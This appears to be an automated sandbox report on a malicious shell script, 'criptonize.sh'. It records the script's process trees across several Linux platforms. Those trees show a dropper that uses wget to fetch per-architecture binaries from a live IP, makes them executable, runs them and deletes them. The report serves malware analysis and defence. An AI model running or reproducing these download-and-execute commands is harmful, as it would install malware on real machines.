Analysis Overview
SHA256
5231c1a078c018a6abea6fadde67300a961c9b528743464806246a3be619b405
Threat Level: Likely malicious
The file criptonize.sh was found to be: Likely malicious.
Malicious Activity Summary
Writes memory of remote process
Loads a kernel module
Checks CPU configuration
Writes file to tmp directory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-08-27 23:47
Signatures
Analysis: behavioral6
Detonation Overview
Submitted
2024-08-27 23:47
Reported
2024-08-27 23:47
Platform
ubuntu1804-amd64-20240611-en
Max time kernel
29s
Max time network
30s
Command Line
Signatures
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/criptonize.mips64 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/criptonize.i586 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/criptonize.armv4tl | /usr/bin/wget | N/A |
| File opened for modification | /tmp/criptonize.armv5l | /usr/bin/wget | N/A |
| File opened for modification | /tmp/criptonize.armv4l | /usr/bin/wget | N/A |
| File opened for modification | /tmp/criptonize.mips | /usr/bin/wget | N/A |
| File opened for modification | /tmp/criptonize.i686 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/criptonize.i486 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/criptonize.armv4eb | /usr/bin/wget | N/A |
| File opened for modification | /tmp/criptonize.x86_64 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/criptonize.aarch64 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/criptonize.mipsel | /usr/bin/wget | N/A |
| File opened for modification | /tmp/criptonize.powerpc | /usr/bin/wget | N/A |
| File opened for modification | /tmp/criptonize.armv7l | /usr/bin/wget | N/A |
| File opened for modification | /tmp/criptonize.armv6l | /usr/bin/wget | N/A |
Processes
/tmp/criptonize.sh
[/tmp/criptonize.sh]
/bin/rm
[rm -f criptonize.x86_64]
/usr/bin/wget
[wget -O criptonize.x86_64 http://212.60.5.174/criptonize.x86_64]
/bin/chmod
[chmod 777 criptonize.x86_64]
/tmp/criptonize.x86_64
[./criptonize.x86_64 x86_64]
/bin/rm
[rm -f criptonize.x86_64]
/bin/rm
[rm -f criptonize.i686]
/usr/bin/wget
[wget -O criptonize.i686 http://212.60.5.174/criptonize.i686]
/bin/chmod
[chmod 777 criptonize.i686]
/tmp/criptonize.i686
[./criptonize.i686 i686]
/bin/rm
[rm -f criptonize.i686]
/bin/rm
[rm -f criptonize.i586]
/usr/bin/wget
[wget -O criptonize.i586 http://212.60.5.174/criptonize.i586]
/bin/chmod
[chmod 777 criptonize.i586]
/tmp/criptonize.i586
[./criptonize.i586 i586]
/bin/rm
[rm -f criptonize.i586]
/bin/rm
[rm -f criptonize.i486]
/usr/bin/wget
[wget -O criptonize.i486 http://212.60.5.174/criptonize.i486]
/bin/chmod
[chmod 777 criptonize.i486]
/tmp/criptonize.i486
[./criptonize.i486 i486]
/bin/rm
[rm -f criptonize.i486]
/bin/rm
[rm -f criptonize.aarch64]
/usr/bin/wget
[wget -O criptonize.aarch64 http://212.60.5.174/criptonize.aarch64]
/bin/chmod
[chmod 777 criptonize.aarch64]
/tmp/criptonize.aarch64
[./criptonize.aarch64 aarch64]
/bin/rm
[rm -f criptonize.aarch64]
/bin/rm
[rm -f criptonize.armv7l]
/usr/bin/wget
[wget -O criptonize.armv7l http://212.60.5.174/criptonize.armv7l]
/bin/chmod
[chmod 777 criptonize.armv7l]
/tmp/criptonize.armv7l
[./criptonize.armv7l armv7l]
/bin/rm
[rm -f criptonize.armv7l]
/bin/rm
[rm -f criptonize.armv6l]
/usr/bin/wget
[wget -O criptonize.armv6l http://212.60.5.174/criptonize.armv6l]
/bin/chmod
[chmod 777 criptonize.armv6l]
/tmp/criptonize.armv6l
[./criptonize.armv6l armv6l]
/bin/rm
[rm -f criptonize.armv6l]
/bin/rm
[rm -f criptonize.armv5l]
/usr/bin/wget
[wget -O criptonize.armv5l http://212.60.5.174/criptonize.armv5l]
/bin/chmod
[chmod 777 criptonize.armv5l]
/tmp/criptonize.armv5l
[./criptonize.armv5l armv5l]
/bin/rm
[rm -f criptonize.armv5l]
/bin/rm
[rm -f criptonize.armv4eb]
/usr/bin/wget
[wget -O criptonize.armv4eb http://212.60.5.174/criptonize.armv4eb]
/bin/chmod
[chmod 777 criptonize.armv4eb]
/tmp/criptonize.armv4eb
[./criptonize.armv4eb armv4eb]
/bin/rm
[rm -f criptonize.armv4eb]
/bin/rm
[rm -f criptonize.armv4tl]
/usr/bin/wget
[wget -O criptonize.armv4tl http://212.60.5.174/criptonize.armv4tl]
/bin/chmod
[chmod 777 criptonize.armv4tl]
/tmp/criptonize.armv4tl
[./criptonize.armv4tl armv4tl]
/bin/rm
[rm -f criptonize.armv4tl]
/bin/rm
[rm -f criptonize.armv4l]
/usr/bin/wget
[wget -O criptonize.armv4l http://212.60.5.174/criptonize.armv4l]
/bin/chmod
[chmod 777 criptonize.armv4l]
/tmp/criptonize.armv4l
[./criptonize.armv4l armv4l]
/bin/rm
[rm -f criptonize.armv4l]
/bin/rm
[rm -f criptonize.mips64]
/usr/bin/wget
[wget -O criptonize.mips64 http://212.60.5.174/criptonize.mips64]
/bin/chmod
[chmod 777 criptonize.mips64]
/tmp/criptonize.mips64
[./criptonize.mips64 mips64]
/bin/rm
[rm -f criptonize.mips64]
/bin/rm
[rm -f criptonize.mips]
/usr/bin/wget
[wget -O criptonize.mips http://212.60.5.174/criptonize.mips]
/bin/chmod
[chmod 777 criptonize.mips]
/tmp/criptonize.mips
[./criptonize.mips mips]
/bin/rm
[rm -f criptonize.mips]
/bin/rm
[rm -f criptonize.mipsel]
/usr/bin/wget
[wget -O criptonize.mipsel http://212.60.5.174/criptonize.mipsel]
/bin/chmod
[chmod 777 criptonize.mipsel]
/tmp/criptonize.mipsel
[./criptonize.mipsel mipsel]
/bin/rm
[rm -f criptonize.mipsel]
/bin/rm
[rm -f criptonize.powerpc]
/usr/bin/wget
[wget -O criptonize.powerpc http://212.60.5.174/criptonize.powerpc]
Network
| Country | Destination | Domain | Proto |
| RU | 212.60.5.174:80 | 212.60.5.174 | tcp |
| N/A | 224.0.0.251:5353 | udp | |
| GB | 185.125.188.62:443 | tcp | |
| GB | 185.125.188.62:443 | tcp | |
| US | 151.101.1.91:443 | tcp | |
| US | 151.101.1.91:443 | tcp | |
| RU | 212.60.5.174:80 | 212.60.5.174 | tcp |
| GB | 195.181.164.14:443 | tcp | |
| RU | 212.60.5.174:80 | 212.60.5.174 | tcp |
| RU | 212.60.5.174:80 | 212.60.5.174 | tcp |
| RU | 212.60.5.174:80 | 212.60.5.174 | tcp |
| RU | 212.60.5.174:80 | 212.60.5.174 | tcp |
| RU | 212.60.5.174:80 | 212.60.5.174 | tcp |
| RU | 212.60.5.174:80 | 212.60.5.174 | tcp |
| RU | 212.60.5.174:80 | 212.60.5.174 | tcp |
| RU | 212.60.5.174:80 | 212.60.5.174 | tcp |
| RU | 212.60.5.174:80 | 212.60.5.174 | tcp |
| RU | 212.60.5.174:80 | 212.60.5.174 | tcp |
| RU | 212.60.5.174:80 | 212.60.5.174 | tcp |
| RU | 212.60.5.174:80 | 212.60.5.174 | tcp |
| RU | 212.60.5.174:80 | 212.60.5.174 | tcp |
Files
Analysis: behavioral7
Detonation Overview
Submitted
2024-08-27 23:47
Reported
2024-08-27 23:47
Platform
ubuntu2004-amd64-20240508-en
Max time kernel
27s
Max time network
32s
Command Line
Signatures
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/criptonize.armv4eb | /usr/bin/wget | N/A |
| File opened for modification | /tmp/criptonize.mips64 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/criptonize.m68k | /usr/bin/wget | N/A |
| File opened for modification | /tmp/criptonize.arc700 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/criptonize.powerpc | /usr/bin/wget | N/A |
| File opened for modification | /tmp/criptonize.sparc | /usr/bin/wget | N/A |
| File opened for modification | /tmp/criptonize.i586 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/criptonize.i486 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/criptonize.aarch64 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/criptonize.armv7l | /usr/bin/wget | N/A |
| File opened for modification | /tmp/criptonize.armv5l | /usr/bin/wget | N/A |
| File opened for modification | /tmp/criptonize.armv6l | /usr/bin/wget | N/A |
| File opened for modification | /tmp/criptonize.armv4tl | /usr/bin/wget | N/A |
| File opened for modification | /tmp/criptonize.mips | /usr/bin/wget | N/A |
| File opened for modification | /tmp/criptonize.sh4 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/criptonize.x86_64 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/criptonize.i686 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/criptonize.armv4l | /usr/bin/wget | N/A |
| File opened for modification | /tmp/criptonize.mipsel | /usr/bin/wget | N/A |
| File opened for modification | /tmp/criptonize.bsdamd64 | /usr/bin/wget | N/A |
Processes
/tmp/criptonize.sh
[/tmp/criptonize.sh]
/usr/bin/rm
[rm -f criptonize.x86_64]
/usr/bin/wget
[wget -O criptonize.x86_64 http://212.60.5.174/criptonize.x86_64]
/usr/bin/chmod
[chmod 777 criptonize.x86_64]
/tmp/criptonize.x86_64
[./criptonize.x86_64 x86_64]
/usr/bin/rm
[rm -f criptonize.x86_64]
/usr/bin/rm
[rm -f criptonize.i686]
/usr/bin/wget
[wget -O criptonize.i686 http://212.60.5.174/criptonize.i686]
/usr/bin/chmod
[chmod 777 criptonize.i686]
/tmp/criptonize.i686
[./criptonize.i686 i686]
/usr/bin/rm
[rm -f criptonize.i686]
/usr/bin/rm
[rm -f criptonize.i586]
/usr/bin/wget
[wget -O criptonize.i586 http://212.60.5.174/criptonize.i586]
/usr/bin/chmod
[chmod 777 criptonize.i586]
/tmp/criptonize.i586
[./criptonize.i586 i586]
/usr/bin/rm
[rm -f criptonize.i586]
/usr/bin/rm
[rm -f criptonize.i486]
/usr/bin/wget
[wget -O criptonize.i486 http://212.60.5.174/criptonize.i486]
/usr/bin/chmod
[chmod 777 criptonize.i486]
/tmp/criptonize.i486
[./criptonize.i486 i486]
/usr/bin/rm
[rm -f criptonize.i486]
/usr/bin/rm
[rm -f criptonize.aarch64]
/usr/bin/wget
[wget -O criptonize.aarch64 http://212.60.5.174/criptonize.aarch64]
/usr/bin/chmod
[chmod 777 criptonize.aarch64]
/tmp/criptonize.aarch64
[./criptonize.aarch64 aarch64]
/usr/bin/rm
[rm -f criptonize.aarch64]
/usr/bin/rm
[rm -f criptonize.armv7l]
/usr/bin/wget
[wget -O criptonize.armv7l http://212.60.5.174/criptonize.armv7l]
/usr/bin/chmod
[chmod 777 criptonize.armv7l]
/tmp/criptonize.armv7l
[./criptonize.armv7l armv7l]
/usr/bin/rm
[rm -f criptonize.armv7l]
/usr/bin/rm
[rm -f criptonize.armv6l]
/usr/bin/wget
[wget -O criptonize.armv6l http://212.60.5.174/criptonize.armv6l]
/usr/bin/chmod
[chmod 777 criptonize.armv6l]
/tmp/criptonize.armv6l
[./criptonize.armv6l armv6l]
/usr/bin/rm
[rm -f criptonize.armv6l]
/usr/bin/rm
[rm -f criptonize.armv5l]
/usr/bin/wget
[wget -O criptonize.armv5l http://212.60.5.174/criptonize.armv5l]
/usr/bin/chmod
[chmod 777 criptonize.armv5l]
/tmp/criptonize.armv5l
[./criptonize.armv5l armv5l]
/usr/bin/rm
[rm -f criptonize.armv5l]
/usr/bin/rm
[rm -f criptonize.armv4eb]
/usr/bin/wget
[wget -O criptonize.armv4eb http://212.60.5.174/criptonize.armv4eb]
/usr/bin/chmod
[chmod 777 criptonize.armv4eb]
/tmp/criptonize.armv4eb
[./criptonize.armv4eb armv4eb]
/usr/bin/rm
[rm -f criptonize.armv4eb]
/usr/bin/rm
[rm -f criptonize.armv4tl]
/usr/bin/wget
[wget -O criptonize.armv4tl http://212.60.5.174/criptonize.armv4tl]
/usr/bin/chmod
[chmod 777 criptonize.armv4tl]
/tmp/criptonize.armv4tl
[./criptonize.armv4tl armv4tl]
/usr/bin/rm
[rm -f criptonize.armv4tl]
/usr/bin/rm
[rm -f criptonize.armv4l]
/usr/bin/wget
[wget -O criptonize.armv4l http://212.60.5.174/criptonize.armv4l]
/usr/bin/chmod
[chmod 777 criptonize.armv4l]
/tmp/criptonize.armv4l
[./criptonize.armv4l armv4l]
/usr/bin/rm
[rm -f criptonize.armv4l]
/usr/bin/rm
[rm -f criptonize.mips64]
/usr/bin/wget
[wget -O criptonize.mips64 http://212.60.5.174/criptonize.mips64]
/usr/bin/chmod
[chmod 777 criptonize.mips64]
/tmp/criptonize.mips64
[./criptonize.mips64 mips64]
/usr/bin/rm
[rm -f criptonize.mips64]
/usr/bin/rm
[rm -f criptonize.mips]
/usr/bin/wget
[wget -O criptonize.mips http://212.60.5.174/criptonize.mips]
/usr/bin/chmod
[chmod 777 criptonize.mips]
/tmp/criptonize.mips
[./criptonize.mips mips]
/usr/bin/rm
[rm -f criptonize.mips]
/usr/bin/rm
[rm -f criptonize.mipsel]
/usr/bin/wget
[wget -O criptonize.mipsel http://212.60.5.174/criptonize.mipsel]
/usr/bin/chmod
[chmod 777 criptonize.mipsel]
/tmp/criptonize.mipsel
[./criptonize.mipsel mipsel]
/usr/bin/rm
[rm -f criptonize.mipsel]
/usr/bin/rm
[rm -f criptonize.powerpc]
/usr/bin/wget
[wget -O criptonize.powerpc http://212.60.5.174/criptonize.powerpc]
/usr/bin/chmod
[chmod 777 criptonize.powerpc]
/tmp/criptonize.powerpc
[./criptonize.powerpc powerpc]
/usr/bin/rm
[rm -f criptonize.powerpc]
/usr/bin/rm
[rm -f criptonize.m68k]
/usr/bin/wget
[wget -O criptonize.m68k http://212.60.5.174/criptonize.m68k]
/usr/bin/chmod
[chmod 777 criptonize.m68k]
/tmp/criptonize.m68k
[./criptonize.m68k m68k]
/usr/bin/rm
[rm -f criptonize.m68k]
/usr/bin/rm
[rm -f criptonize.sh4]
/usr/bin/wget
[wget -O criptonize.sh4 http://212.60.5.174/criptonize.sh4]
/usr/bin/chmod
[chmod 777 criptonize.sh4]
/tmp/criptonize.sh4
[./criptonize.sh4 sh4]
/usr/bin/rm
[rm -f criptonize.sh4]
/usr/bin/rm
[rm -f criptonize.sparc]
/usr/bin/wget
[wget -O criptonize.sparc http://212.60.5.174/criptonize.sparc]
/usr/bin/chmod
[chmod 777 criptonize.sparc]
/tmp/criptonize.sparc
[./criptonize.sparc sparc]
/usr/bin/rm
[rm -f criptonize.sparc]
/usr/bin/rm
[rm -f criptonize.arc700]
/usr/bin/wget
[wget -O criptonize.arc700 http://212.60.5.174/criptonize.arc700]
/usr/bin/chmod
[chmod 777 criptonize.arc700]
/tmp/criptonize.arc700
[./criptonize.arc700 arc700]
/usr/bin/rm
[rm -f criptonize.arc700]
/usr/bin/rm
[rm -f criptonize.bsdamd64]
/usr/bin/wget
[wget -O criptonize.bsdamd64 http://212.60.5.174/criptonize.bsdamd64]
/usr/bin/chmod
[chmod 777 criptonize.bsdamd64]
/tmp/criptonize.bsdamd64
[./criptonize.bsdamd64 bsdamd64]
/usr/bin/rm
[rm -f criptonize.bsdamd64]
Network
| Country | Destination | Domain | Proto |
| N/A | 224.0.0.251:5353 | udp | |
| RU | 212.60.5.174:80 | 212.60.5.174 | tcp |
| US | 1.1.1.1:53 | connectivity-check.ubuntu.com | udp |
| RU | 212.60.5.174:80 | 212.60.5.174 | tcp |
| RU | 212.60.5.174:80 | 212.60.5.174 | tcp |
| RU | 212.60.5.174:80 | 212.60.5.174 | tcp |
| RU | 212.60.5.174:80 | 212.60.5.174 | tcp |
| RU | 212.60.5.174:80 | 212.60.5.174 | tcp |
| RU | 212.60.5.174:80 | 212.60.5.174 | tcp |
| RU | 212.60.5.174:80 | 212.60.5.174 | tcp |
| RU | 212.60.5.174:80 | 212.60.5.174 | tcp |
| RU | 212.60.5.174:80 | 212.60.5.174 | tcp |
| RU | 212.60.5.174:80 | 212.60.5.174 | tcp |
| RU | 212.60.5.174:80 | 212.60.5.174 | tcp |
| RU | 212.60.5.174:80 | 212.60.5.174 | tcp |
| RU | 212.60.5.174:80 | 212.60.5.174 | tcp |
| RU | 212.60.5.174:80 | 212.60.5.174 | tcp |
| RU | 212.60.5.174:80 | 212.60.5.174 | tcp |
| RU | 212.60.5.174:80 | 212.60.5.174 | tcp |
| RU | 212.60.5.174:80 | 212.60.5.174 | tcp |
| RU | 212.60.5.174:80 | 212.60.5.174 | tcp |
| RU | 212.60.5.174:80 | 212.60.5.174 | tcp |
Files
Analysis: behavioral8
Detonation Overview
Submitted
2024-08-27 23:47
Reported
2024-08-27 23:47
Platform
ubuntu2204-amd64-20240611-en
Max time kernel
29s
Max time network
29s
Command Line
Signatures
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/criptonize.i586 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/criptonize.armv6l | /usr/bin/wget | N/A |
| File opened for modification | /tmp/criptonize.mips | /usr/bin/wget | N/A |
| File opened for modification | /tmp/criptonize.mips64 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/criptonize.x86_64 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/criptonize.aarch64 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/criptonize.armv7l | /usr/bin/wget | N/A |
| File opened for modification | /tmp/criptonize.armv5l | /usr/bin/wget | N/A |
| File opened for modification | /tmp/criptonize.armv4eb | /usr/bin/wget | N/A |
| File opened for modification | /tmp/criptonize.armv4tl | /usr/bin/wget | N/A |
| File opened for modification | /tmp/criptonize.i486 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/criptonize.mipsel | /usr/bin/wget | N/A |
| File opened for modification | /tmp/criptonize.i686 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/criptonize.armv4l | /usr/bin/wget | N/A |
Processes
/tmp/criptonize.sh
[/tmp/criptonize.sh]
/usr/bin/rm
[rm -f criptonize.x86_64]
/usr/bin/wget
[wget -O criptonize.x86_64 http://212.60.5.174/criptonize.x86_64]
/usr/bin/chmod
[chmod 777 criptonize.x86_64]
/tmp/criptonize.x86_64
[./criptonize.x86_64 x86_64]
/usr/bin/rm
[rm -f criptonize.x86_64]
/usr/bin/rm
[rm -f criptonize.i686]
/usr/bin/wget
[wget -O criptonize.i686 http://212.60.5.174/criptonize.i686]
/usr/bin/chmod
[chmod 777 criptonize.i686]
/tmp/criptonize.i686
[./criptonize.i686 i686]
/usr/bin/rm
[rm -f criptonize.i686]
/usr/bin/rm
[rm -f criptonize.i586]
/usr/bin/wget
[wget -O criptonize.i586 http://212.60.5.174/criptonize.i586]
/usr/bin/chmod
[chmod 777 criptonize.i586]
/tmp/criptonize.i586
[./criptonize.i586 i586]
/usr/bin/rm
[rm -f criptonize.i586]
/usr/bin/rm
[rm -f criptonize.i486]
/usr/bin/wget
[wget -O criptonize.i486 http://212.60.5.174/criptonize.i486]
/usr/bin/chmod
[chmod 777 criptonize.i486]
/tmp/criptonize.i486
[./criptonize.i486 i486]
/usr/bin/rm
[rm -f criptonize.i486]
/usr/bin/rm
[rm -f criptonize.aarch64]
/usr/bin/wget
[wget -O criptonize.aarch64 http://212.60.5.174/criptonize.aarch64]
/usr/bin/chmod
[chmod 777 criptonize.aarch64]
/tmp/criptonize.aarch64
[./criptonize.aarch64 aarch64]
/usr/bin/rm
[rm -f criptonize.aarch64]
/usr/bin/rm
[rm -f criptonize.armv7l]
/usr/bin/wget
[wget -O criptonize.armv7l http://212.60.5.174/criptonize.armv7l]
/usr/bin/chmod
[chmod 777 criptonize.armv7l]
/tmp/criptonize.armv7l
[./criptonize.armv7l armv7l]
/usr/bin/rm
[rm -f criptonize.armv7l]
/usr/bin/rm
[rm -f criptonize.armv6l]
/usr/bin/wget
[wget -O criptonize.armv6l http://212.60.5.174/criptonize.armv6l]
/usr/bin/chmod
[chmod 777 criptonize.armv6l]
/tmp/criptonize.armv6l
[./criptonize.armv6l armv6l]
/usr/bin/rm
[rm -f criptonize.armv6l]
/usr/bin/rm
[rm -f criptonize.armv5l]
/usr/bin/wget
[wget -O criptonize.armv5l http://212.60.5.174/criptonize.armv5l]
/usr/bin/chmod
[chmod 777 criptonize.armv5l]
/tmp/criptonize.armv5l
[./criptonize.armv5l armv5l]
/usr/bin/rm
[rm -f criptonize.armv5l]
/usr/bin/rm
[rm -f criptonize.armv4eb]
/usr/bin/wget
[wget -O criptonize.armv4eb http://212.60.5.174/criptonize.armv4eb]
/usr/bin/chmod
[chmod 777 criptonize.armv4eb]
/tmp/criptonize.armv4eb
[./criptonize.armv4eb armv4eb]
/usr/bin/rm
[rm -f criptonize.armv4eb]
/usr/bin/rm
[rm -f criptonize.armv4tl]
/usr/bin/wget
[wget -O criptonize.armv4tl http://212.60.5.174/criptonize.armv4tl]
/usr/bin/chmod
[chmod 777 criptonize.armv4tl]
/tmp/criptonize.armv4tl
[./criptonize.armv4tl armv4tl]
/usr/bin/rm
[rm -f criptonize.armv4tl]
/usr/bin/rm
[rm -f criptonize.armv4l]
/usr/bin/wget
[wget -O criptonize.armv4l http://212.60.5.174/criptonize.armv4l]
/usr/bin/chmod
[chmod 777 criptonize.armv4l]
/tmp/criptonize.armv4l
[./criptonize.armv4l armv4l]
/usr/bin/rm
[rm -f criptonize.armv4l]
/usr/bin/rm
[rm -f criptonize.mips64]
/usr/bin/wget
[wget -O criptonize.mips64 http://212.60.5.174/criptonize.mips64]
/usr/bin/chmod
[chmod 777 criptonize.mips64]
/tmp/criptonize.mips64
[./criptonize.mips64 mips64]
/usr/bin/rm
[rm -f criptonize.mips64]
/usr/bin/rm
[rm -f criptonize.mips]
/usr/bin/wget
[wget -O criptonize.mips http://212.60.5.174/criptonize.mips]
/usr/bin/chmod
[chmod 777 criptonize.mips]
/tmp/criptonize.mips
[./criptonize.mips mips]
/usr/bin/rm
[rm -f criptonize.mips]
/usr/bin/rm
[rm -f criptonize.mipsel]
/usr/bin/wget
[wget -O criptonize.mipsel http://212.60.5.174/criptonize.mipsel]
Network
| Country | Destination | Domain | Proto |
| N/A | 224.0.0.251:5353 | udp | |
| RU | 212.60.5.174:80 | 212.60.5.174 | tcp |
| RU | 212.60.5.174:80 | 212.60.5.174 | tcp |
| RU | 212.60.5.174:80 | 212.60.5.174 | tcp |
| RU | 212.60.5.174:80 | 212.60.5.174 | tcp |
| RU | 212.60.5.174:80 | 212.60.5.174 | tcp |
| RU | 212.60.5.174:80 | 212.60.5.174 | tcp |
| RU | 212.60.5.174:80 | 212.60.5.174 | tcp |
| RU | 212.60.5.174:80 | 212.60.5.174 | tcp |
| RU | 212.60.5.174:80 | 212.60.5.174 | tcp |
| RU | 212.60.5.174:80 | 212.60.5.174 | tcp |
| RU | 212.60.5.174:80 | 212.60.5.174 | tcp |
| RU | 212.60.5.174:80 | 212.60.5.174 | tcp |
| RU | 212.60.5.174:80 | 212.60.5.174 | tcp |
Files
Analysis: behavioral5
Detonation Overview
Submitted
2024-08-27 23:47
Reported
2024-08-27 23:47
Platform
debian9-mipsel-20240729-en
Max time kernel
30s
Max time network
31s
Command Line
Signatures
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/criptonize.i686 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/criptonize.i486 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/criptonize.aarch64 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/criptonize.armv4eb | /usr/bin/wget | N/A |
| File opened for modification | /tmp/criptonize.mips64 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/criptonize.armv4l | /usr/bin/wget | N/A |
| File opened for modification | /tmp/criptonize.x86_64 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/criptonize.i586 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/criptonize.armv7l | /usr/bin/wget | N/A |
| File opened for modification | /tmp/criptonize.armv6l | /usr/bin/wget | N/A |
| File opened for modification | /tmp/criptonize.armv5l | /usr/bin/wget | N/A |
| File opened for modification | /tmp/criptonize.armv4tl | /usr/bin/wget | N/A |
Processes
/tmp/criptonize.sh
[/tmp/criptonize.sh]
/bin/rm
[rm -f criptonize.x86_64]
/usr/bin/wget
[wget -O criptonize.x86_64 http://212.60.5.174/criptonize.x86_64]
/bin/chmod
[chmod 777 criptonize.x86_64]
/tmp/criptonize.x86_64
[./criptonize.x86_64 x86_64]
/bin/rm
[rm -f criptonize.x86_64]
/bin/rm
[rm -f criptonize.i686]
/usr/bin/wget
[wget -O criptonize.i686 http://212.60.5.174/criptonize.i686]
/bin/chmod
[chmod 777 criptonize.i686]
/tmp/criptonize.i686
[./criptonize.i686 i686]
/bin/rm
[rm -f criptonize.i686]
/bin/rm
[rm -f criptonize.i586]
/usr/bin/wget
[wget -O criptonize.i586 http://212.60.5.174/criptonize.i586]
/bin/chmod
[chmod 777 criptonize.i586]
/tmp/criptonize.i586
[./criptonize.i586 i586]
/bin/rm
[rm -f criptonize.i586]
/bin/rm
[rm -f criptonize.i486]
/usr/bin/wget
[wget -O criptonize.i486 http://212.60.5.174/criptonize.i486]
/bin/chmod
[chmod 777 criptonize.i486]
/tmp/criptonize.i486
[./criptonize.i486 i486]
/bin/rm
[rm -f criptonize.i486]
/bin/rm
[rm -f criptonize.aarch64]
/usr/bin/wget
[wget -O criptonize.aarch64 http://212.60.5.174/criptonize.aarch64]
/bin/chmod
[chmod 777 criptonize.aarch64]
/tmp/criptonize.aarch64
[./criptonize.aarch64 aarch64]
/bin/rm
[rm -f criptonize.aarch64]
/bin/rm
[rm -f criptonize.armv7l]
/usr/bin/wget
[wget -O criptonize.armv7l http://212.60.5.174/criptonize.armv7l]
/bin/chmod
[chmod 777 criptonize.armv7l]
/tmp/criptonize.armv7l
[./criptonize.armv7l armv7l]
/bin/rm
[rm -f criptonize.armv7l]
/bin/rm
[rm -f criptonize.armv6l]
/usr/bin/wget
[wget -O criptonize.armv6l http://212.60.5.174/criptonize.armv6l]
/bin/chmod
[chmod 777 criptonize.armv6l]
/tmp/criptonize.armv6l
[./criptonize.armv6l armv6l]
/bin/rm
[rm -f criptonize.armv6l]
/bin/rm
[rm -f criptonize.armv5l]
/usr/bin/wget
[wget -O criptonize.armv5l http://212.60.5.174/criptonize.armv5l]
/bin/chmod
[chmod 777 criptonize.armv5l]
/tmp/criptonize.armv5l
[./criptonize.armv5l armv5l]
/bin/rm
[rm -f criptonize.armv5l]
/bin/rm
[rm -f criptonize.armv4eb]
/usr/bin/wget
[wget -O criptonize.armv4eb http://212.60.5.174/criptonize.armv4eb]
/bin/chmod
[chmod 777 criptonize.armv4eb]
/tmp/criptonize.armv4eb
[./criptonize.armv4eb armv4eb]
/bin/rm
[rm -f criptonize.armv4eb]
/bin/rm
[rm -f criptonize.armv4tl]
/usr/bin/wget
[wget -O criptonize.armv4tl http://212.60.5.174/criptonize.armv4tl]
/bin/chmod
[chmod 777 criptonize.armv4tl]
/tmp/criptonize.armv4tl
[./criptonize.armv4tl armv4tl]
/bin/rm
[rm -f criptonize.armv4tl]
/bin/rm
[rm -f criptonize.armv4l]
/usr/bin/wget
[wget -O criptonize.armv4l http://212.60.5.174/criptonize.armv4l]
/bin/chmod
[chmod 777 criptonize.armv4l]
/tmp/criptonize.armv4l
[./criptonize.armv4l armv4l]
/bin/rm
[rm -f criptonize.armv4l]
/bin/rm
[rm -f criptonize.mips64]
/usr/bin/wget
[wget -O criptonize.mips64 http://212.60.5.174/criptonize.mips64]
/bin/chmod
[chmod 777 criptonize.mips64]
/tmp/criptonize.mips64
[./criptonize.mips64 mips64]
/bin/rm
[rm -f criptonize.mips64]
/bin/rm
[rm -f criptonize.mips]
Network
| Country | Destination | Domain | Proto |
| RU | 212.60.5.174:80 | 212.60.5.174 | tcp |
| RU | 212.60.5.174:80 | 212.60.5.174 | tcp |
| RU | 212.60.5.174:80 | 212.60.5.174 | tcp |
| RU | 212.60.5.174:80 | 212.60.5.174 | tcp |
| RU | 212.60.5.174:80 | 212.60.5.174 | tcp |
| RU | 212.60.5.174:80 | 212.60.5.174 | tcp |
| RU | 212.60.5.174:80 | 212.60.5.174 | tcp |
| RU | 212.60.5.174:80 | 212.60.5.174 | tcp |
| RU | 212.60.5.174:80 | 212.60.5.174 | tcp |
| RU | 212.60.5.174:80 | 212.60.5.174 | tcp |
| RU | 212.60.5.174:80 | 212.60.5.174 | tcp |
| RU | 212.60.5.174:80 | 212.60.5.174 | tcp |
Files
Analysis: behavioral3
Detonation Overview
Submitted
2024-08-27 23:47
Reported
2024-08-27 23:48
Platform
debian9-armhf-20240611-en
Max time kernel
28s
Max time network
48s
Command Line
Signatures
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/criptonize.x86_64 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/criptonize.i586 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/criptonize.aarch64 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/criptonize.mips | /usr/bin/wget | N/A |
| File opened for modification | /tmp/criptonize.armv4l | /usr/bin/wget | N/A |
| File opened for modification | /tmp/criptonize.mipsel | /usr/bin/wget | N/A |
| File opened for modification | /tmp/criptonize.armv7l | /usr/bin/wget | N/A |
| File opened for modification | /tmp/criptonize.armv4eb | /usr/bin/wget | N/A |
| File opened for modification | /tmp/criptonize.mips64 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/criptonize.i686 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/criptonize.i486 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/criptonize.armv6l | /usr/bin/wget | N/A |
| File opened for modification | /tmp/criptonize.armv5l | /usr/bin/wget | N/A |
